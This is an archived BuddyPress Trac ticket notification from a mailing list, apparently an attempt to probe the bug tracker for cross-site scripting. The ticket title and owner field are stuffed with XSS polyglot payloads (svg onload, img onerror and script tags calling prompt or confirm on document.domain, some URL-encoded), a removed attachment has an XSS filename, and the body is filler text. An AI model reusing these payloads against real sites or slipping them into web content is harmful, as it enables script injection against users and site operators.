[buddypress-trac] [BuddyPress Trac] #7937: --><svg><x><script AND /*/*/*>prompt`xssposed`</x> "><img sRc=l oNerrOr=prompt(document.domain) x> "'--!><Script /K/>confirm(document.domain)</Script /K/> '"--></style></scRipt><scRipt>alert(0x02F4B8)</scRipt> a>'>">t<i>p<img+src%3Dy+onerror%3Dprompt(%2FOPENBUGBOUNTY%2F)> %3C/script%3E%3Csvg/onload%3Dconfirm(document.domain)%3E <svG onLoad=prompt(9)> "><svg/onload=confirm(1)>;
buddypress-trac
noreply at wordpress.org
Wed Jul 25 22:03:54 UTC 2018
#7937: --><svg><x><script AND /*/*/*>prompt`xssposed`</x> "><img sRc=l
oNerrOr=prompt(document.domain) x> "'--!><Script
/K/>confirm(document.domain)</Script /K/>
'"--></style></scRipt><scRipt>alert(0x02F4B8)</scRipt>
a>'>">t<i>p<img+src%3Dy+onerror%3Dprompt(%2FOPENBUGBOUNTY%2F)>
%3C/script%3E%3Csvg/onload%3Dconfirm(document.domain)%3E <svG
onLoad=prompt(9)> "><svg/onload=confirm(1)>;
-------------------------+-------------------------------------------------
Reporter: safwa | Owner: --><svg><x><script AND
| /*/*/*>prompt`xssposed`</x> "><img sRc=l
| oNerrOr=prompt(document.domain) x>
| "'--!><Script
| /K/>confirm(document.domain)</Script /K/>
| '"--></style></scRipt><scRipt>alert(0x02F4B8)</scRipt>
| a>'>">t<i>p<img+src%3Dy+onerror%3Dprompt(%2FOPENBUGBOUNTY%2F)>
| %3C/script%3E%3Csvg/onload%3Dconfirm(document.domain)%3E
| <svG onLoad=prompt(9)>
Type: defect | "><svg/onload=confirm(1)>;
(bug) | Status: assigned
Priority: normal | Milestone: Awaiting Review
Component: Core | Version: 3.0.0
Severity: normal | Resolution:
Keywords: has-patch |
-------------------------+-------------------------------------------------
Changes (by safwa):
* Attachment "(%img src=x onerror=prompt('XSS'))%.jpg" removed.
fdsaf
--
Ticket URL: <https://buddypress.trac.wordpress.org/ticket/7937>
BuddyPress Trac <http://buddypress.org/>
BuddyPress Trac
More information about the buddypress-trac
mailing list